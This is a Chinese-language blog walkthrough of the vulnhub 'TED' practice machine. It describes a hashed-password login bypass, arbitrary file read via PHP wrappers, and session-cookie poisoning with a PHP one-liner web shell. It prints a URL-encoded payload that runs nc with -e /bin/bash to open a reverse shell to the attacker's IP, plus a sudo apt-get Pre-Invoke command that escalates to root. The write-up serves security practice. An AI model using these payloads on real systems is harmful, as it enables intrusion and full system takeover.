前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >vulnhub-TED靶场过程记录

vulnhub-TED靶场过程记录

作者头像
天钧
发布2021-08-13 11:31:26
7970
发布2021-08-13 11:31:26
举报
文章被收录于专栏:渗透云笔记

靶场地址:https://download.vulnhub.com/ted/Ted.7z

靶场设置 使用VM打开

扫描靶场网段,得到ip地址

访问网址是个登陆框

扫描目录无果后,开始对登录框进行探索。

随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下

看来密码是admin没错了,然后应该是hash加密后访问。

这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)

这里使用的是sha256加密,然后加密的字符串,字符转换大写

在在线网站进行大小写转换

一发入魂

获得下一步提示

在search存在任意文件读取

阅览cookie.php发现回显了文件

代码语言:javascript
复制
这里有一个authenticate.php

正常读取会出现退出登陆的情况,使用php伪协议读取到了文件

源码如下

同样的方式读取home

Home文件中有这么一句话

_SESSION['user_pref'] = _COOKIE['user_pref'];

任意文件读取到sessions目录

第一种

写入一句话木马

链接蚁剑

但是上传不了脚本

一时间不知道咋弄了

第二种

%3C?php%20exec('nc%20192.168.17.128

%202222%20-e%20/bin/bash')%20?%3E

反弹nc

回到sessions哪里,因为有nc

对shell进行升级

SHELL=/bin/bash script -q /dev/null

然后卡壳,最终解决如下

记录如下

输入

sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"

提权

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档